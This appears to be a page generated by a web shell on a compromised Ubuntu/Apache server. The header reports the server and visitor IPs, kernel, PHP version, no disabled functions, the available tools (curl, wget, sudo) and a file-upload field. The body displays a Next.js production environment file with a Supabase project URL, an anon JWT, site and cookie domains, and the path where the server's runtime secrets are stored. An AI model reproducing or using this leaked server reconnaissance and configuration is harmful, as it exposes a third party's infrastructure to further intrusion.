| Server IP : 35.80.110.71 / Your IP : 216.73.216.221 Web Server : Apache/2.4.58 (Ubuntu) System : Linux ip-172-31-21-44 6.17.0-1019-aws #19~24.04.1-Ubuntu SMP Tue Jun 23 18:53:06 UTC 2026 x86_64 User : ubuntu ( 1000) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/cinderblock/current/ |
Upload File : |
# Production NEXT_PUBLIC_* values (inlined into the bundle by `next build`). # # NOTE ON PRECEDENCE: Next loads env files in this order (first match wins): # process.env → .env.production.local → .env.local → .env.production → .env # A local-dev .env.local (127.0.0.1:54321) therefore SHADOWS this file during # a production build. The build override that actually beats .env.local is # .env.production.local — keep the production values there too. # # Runtime-only secrets (service-role key, JWT secret, PG_* URLs) live in # /var/www/cinderblock/shared/.env on the server, NOT here. NEXT_PUBLIC_SUPABASE_URL=https://mabbfeogzbxzqkutzril.supabase.co NEXT_PUBLIC_SUPABASE_ANON_KEY=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6Im1hYmJmZW9nemJ4enFrdXR6cmlsIiwicm9sZSI6ImFub24iLCJpYXQiOjE3ODExOTUwNjksImV4cCI6MjA5Njc3MTA2OX0.9LEZoXPnar2tfu3x1guBW9_Zo8mx05JUKsUBXtOgW8o NEXT_PUBLIC_SITE_URL=https://cinderblock.philiprehberger.com NEXT_PUBLIC_COOKIE_DOMAIN=.cinderblock.philiprehberger.com